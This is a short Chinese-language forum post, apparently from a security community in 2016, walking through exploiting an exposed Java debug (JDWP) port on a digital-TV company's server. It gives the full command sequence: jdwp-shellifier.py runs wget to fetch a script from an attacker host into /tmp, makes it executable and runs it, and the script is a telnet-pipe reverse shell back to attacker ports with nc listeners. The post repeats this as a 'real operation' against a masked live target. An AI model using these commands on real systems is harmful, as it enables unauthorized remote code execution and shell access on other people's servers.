首页
社区
课程
招聘
[旧帖] [推荐]jdwp 反弹 shell 实战案例 0.00雪花
发表于: 2016-7-7 11:06 2665

[旧帖] [推荐]jdwp 反弹 shell 实战案例 0.00雪花

2016-7-7 11:06
2665
反弹shell实战案列:
测试中遇到一个某数字电视jdwp 漏洞,
域名:http://xxx.xxxxx.com.cn:8080/
扫描端口:

发现8000端口 开放jdwp
上利用exp:
(jdwp-shellifier.py )
利用条件需要先访问一下web应用 ,然后执行exp
用法 jdwp-shellifier.py -t 目标IP -p 端口 --cmd "cmd命令"

接下来反弹shell操作:
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "wget http://x.x.x.x/x.txt -O /tmp/x.sh"
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "chmod a+x /tmp/x.sh"
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "/tmp/x.sh"
其中 x.txt内容如下:
telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333
(x.x.x.x 为你自己的外网pc,有路由记得做转发)
然后在x.x.x.x服务器上用nc监听1111端口和3333端口
1111端口是发送命令,3333回显命令结果的
两个cmd窗口

nc -nnv -L -p 3333
nc -nnv -L -p 1111
实际操作:
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "wget http://ai.xxxxx.com/pic.txt -O /tmp/x.sh"
jdwp-shellifier.py -t  *.*.*.* -p 8000 --cmd "chmod a+x /tmp/x.sh"
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "/tmp/x.sh"
(其中http://ai.xxxxx.com/pic.txt ,为我事先准备好的一个下载地址,也就是x.txt的内容)

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
很牛,学习了!!~
2016-7-9 04:28
0
游客
登录 | 注册 方可回帖
返回
//